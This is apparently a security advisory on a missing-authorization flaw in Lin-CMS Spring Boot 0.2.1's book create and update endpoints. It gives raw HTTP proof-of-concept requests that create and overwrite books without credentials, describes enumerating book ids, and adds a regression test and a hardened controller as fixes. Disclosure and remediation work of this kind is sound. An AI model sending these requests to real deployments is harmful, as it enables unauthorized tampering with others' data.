Vulnerability Introduction
A missing-authorization (broken access control) vulnerability exists in version 0.2.1 of Lin-CMS Spring Boot. Two handlers in the BookController.java component are exposed without any authentication or permission check: a remote, unauthenticated attacker can create arbitrary books through the book creation method, and can overwrite the information of any existing book through the book update method.
Vulnerability Analysis
Unauthorized Arbitrary Book Creation Vulnerability
Vulnerable Class File: src/main/java/io/github/talelin/latticy/controller/v1/BookController.java
At line 63 of the file, the route POST /v1/book is mapped to the createBook() method. The method carries no authorization annotation, so no login or permission check runs before it; the handler passes the request body straight through to the service layer, which writes a new book row to the database.
Unauthorized Arbitrary Book Information Update Vulnerability
Vulnerable Class File: src/main/java/io/github/talelin/latticy/controller/v1/BookController.java
At line 70 of the file, the route PUT /v1/book/{id} is mapped to the updateBook() method. This endpoint likewise has no access control or permission validation of any kind. The method only checks whether a book with the supplied id exists and, if it does, overwrites its information; the identity of the caller is never considered. Because id is an auto-incrementing integer, the values are predictable and trivially enumerable (and, as shown in the reproduction below, GET /v1/book lists every book and its id without authentication). An attacker can therefore iterate over the id range and modify every book stored in the database.
Vulnerability Reproduction
Unauthorized Arbitrary Book Creation Vulnerability
Before the attack, the book table contains no row with the title "TEST" (database screenshot not reproduced here).
PoC request, sent without any credentials or session token:
POST /v1/book HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Accept: application/json, text/plain, */*
Content-Type: application/json
Content-Length: 91

{
    "title": "TEST",
    "author": "TEST",
    "summary": "TEST",
    "image": "TEST.jsp"
}

Response: the server's success response (screenshot) is not reproduced here.
Querying the database afterwards shows a new row titled "TEST", confirming that the book was created without any authorization.
Unauthorized Arbitrary Book Information Update Vulnerability
First, list every book currently in the database via GET /v1/book, again without any credentials. The request is as follows:
GET /v1/book HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Accept: application/json, text/plain, */*
Content-Type: application/json
Content-Length: 0

Response: the JSON book list (screenshot) is not reproduced here.
The response reveals books with ids 1 through 6. A simulated attack is then run against the book with id 6 by sending a PUT request to /v1/book/6 to overwrite its information. The Proof of Concept (PoC) is as follows:
PUT /v1/book/6 HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Accept: application/json, text/plain, */*
Content-Type: application/json
Content-Length: 129

{
    "title": "Hacker",
    "author": "Hacker",
    "summary": "Hacker",
    "image": "Hacker.jsp"
}

Response: the server's success response (screenshot) is not reproduced here.
Querying GET /v1/book again shows that the record with id=6 has been modified: its fields changed from "TEST" to "Hacker".
The same change is visible in the database row for id=6.
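The two reproduction steps above can be turned into a regression check so the missing authorization cannot silently return. The following JUnit 5 / Spring MockMvc test is an added example written for this page; it is not part of Lin-CMS and assumes that, once the handlers are protected, an anonymous request to them is answered with HTTP 401 (the exact status and error body used by the framework's interceptor are assumptions, not confirmed by the page). The JSON payload is constructed to mirror the PoC requests.

```java
package io.github.talelin.latticy.controller.v1;

import org.junit.jupiter.api.Test;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.test.autoconfigure.web.servlet.AutoConfigureMockMvc;
import org.springframework.boot.test.context.SpringBootTest;
import org.springframework.http.MediaType;
import org.springframework.test.web.servlet.MockMvc;

import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.post;
import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.put;
import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;

/**
 * Added regression test (not project code): anonymous callers must not be able
 * to reach the book create/update handlers. Assumes the framework answers
 * unauthenticated requests to protected handlers with 401.
 */
@SpringBootTest
@AutoConfigureMockMvc
class BookControllerAuthzTest {

    // Constructed payload mirroring the PoC body used in the reproduction.
    private static final String BODY =
        "{\"title\":\"TEST\",\"author\":\"TEST\",\"summary\":\"TEST\",\"image\":\"TEST.jsp\"}";

    @Autowired
    private MockMvc mockMvc;

    @Test
    void anonymousCreateIsRejected() throws Exception {
        // No Authorization header at all, exactly like the PoC.
        mockMvc.perform(post("/v1/book")
                .contentType(MediaType.APPLICATION_JSON)
                .content(BODY))
            .andExpect(status().isUnauthorized());
    }

    @Test
    void anonymousUpdateIsRejected() throws Exception {
        // Walk the same enumerable id range the attacker would. The rejection
        // must happen before the book lookup, so the status must be the same
        // whether or not a book with that id exists.
        for (int id = 1; id <= 6; id++) {
            mockMvc.perform(put("/v1/book/" + id)
                    .contentType(MediaType.APPLICATION_JSON)
                    .content(BODY))
                .andExpect(status().isUnauthorized());
        }
    }
}
```

If the project maps a missing token to a different status (for example a 200 with an error code in the body, as some Lin-CMS error handlers do), adjust the matcher accordingly; the important property is that the anonymous request never reaches the service layer, which a separate check on the row count in the book table can confirm.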

Vulnerability Remediation Recommendations
Protect the createBook and updateBook methods with the framework's authorization annotations (for example @LoginRequired for any authenticated user, or @GroupRequired together with @PermissionMeta for a specific permission), so that the authorization interceptor rejects unauthenticated and unprivileged callers before the handler runs. Because the interceptor only enforces checks on annotated handlers, also audit the remaining handlers in BookController.java and the other controllers for state-changing routes that lack an annotation.
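The vulnerable handlers next to their hardened form, as an added illustration for this page rather than the project's own source. It assumes the Lin-CMS core annotations @GroupRequired and @PermissionMeta, and a BookService with createBook()/updateBook() methods; the permission names and the DTO/VO class names are assumptions and should be matched to the real code base.

```java
package io.github.talelin.latticy.controller.v1;

import io.github.talelin.core.annotation.GroupRequired;
import io.github.talelin.core.annotation.PermissionMeta;
import io.github.talelin.latticy.dto.book.CreateOrUpdateBookDTO;
import io.github.talelin.latticy.service.BookService;
import io.github.talelin.latticy.vo.CreatedVO;
import io.github.talelin.latticy.vo.UpdatedVO;
import org.springframework.validation.annotation.Validated;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.PutMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;

import javax.validation.constraints.Positive;

/**
 * Illustrative hardened controller (added example, not the project's file).
 * Assumes: the framework's authorization interceptor runs before the handler
 * and only enforces checks on methods that carry one of its annotations.
 */
@RestController
@RequestMapping("/v1/book")
@Validated
public class BookController {

    private final BookService bookService;

    public BookController(BookService bookService) {
        this.bookService = bookService;
    }

    // BEFORE (vulnerable): no annotation, so the interceptor treats the
    // handler as public and anyone on the network can create a book.
    //
    // @PostMapping("")
    // public CreatedVO createBook(@RequestBody @Validated CreateOrUpdateBookDTO validator) {
    //     bookService.createBook(validator);
    //     return new CreatedVO();
    // }

    // AFTER: the caller must hold a valid login token and belong to a group
    // that has been granted the "Create book" permission; otherwise the
    // interceptor rejects the request before this method body runs.
    @PostMapping("")
    @GroupRequired
    @PermissionMeta(value = "Create book", module = "Book")
    public CreatedVO createBook(@RequestBody @Validated CreateOrUpdateBookDTO validator) {
        bookService.createBook(validator);
        return new CreatedVO();
    }

    // AFTER: same treatment for the update route. The existence check on id
    // stays in the service; it is not an authorization check and never was.
    @PutMapping("/{id}")
    @GroupRequired
    @PermissionMeta(value = "Update book", module = "Book")
    public UpdatedVO updateBook(@PathVariable("id") @Positive(message = "{id.positive}") Integer id,
                                @RequestBody @Validated CreateOrUpdateBookDTO validator) {
        bookService.updateBook(id, validator);
        return new UpdatedVO();
    }
}
```

The design point is that the framework's default for an unannotated handler is "open", so the fix is not only the two annotations but a policy of treating every state-changing route without one as a finding.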